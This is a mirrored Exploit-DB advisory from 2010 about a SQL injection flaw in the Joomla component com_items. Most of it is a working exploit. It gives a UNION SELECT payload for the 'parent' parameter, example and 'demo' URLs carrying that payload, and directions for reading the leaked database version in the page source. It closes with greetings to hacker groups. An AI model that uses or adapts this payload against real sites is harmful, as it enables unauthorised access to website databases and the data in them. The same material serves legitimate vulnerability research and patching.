Joomla! Component com_items – SQL Injection

  • 作者: DevilZ TM
    日期: 2010-03-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11941/
  • # Title : Joomla Component com_items SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data: 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title : Joomla Component com_items SQL Injection Vulnerability
    [~] Author: DevilZ TM By D3v1l
    [~] Homepage: http://www.DEVILZTM.com
    [~] Email : Expl0it@DevilZTM.Com
    [~] Contact : D3v1l.blackhat@yahoo.com
     
    [~]######################################### ExploiT #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_items&parent=[SQL]
     
    [~] ExploiT :
     
    -1+UNION+SELECT+version(),2--
    
    Now You Can See Result In Source Page :
    
    Mozila : Ctrl + U
    
    IE : View - Source
     
    [~] Example :
     
    http://127.0.0.1/index.php?option=com_items&parent=-1+UNION+SELECT+version(),2--
    
    [~] Demo:
    
    http://www.site.com/index.php?option=com_items&parent=-1+UNION+SELECT+version(),2--
    
    
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~] GreetZ : Exploit-DB TeaM
    
    [~]######################################### FinisH :D #############################################[~]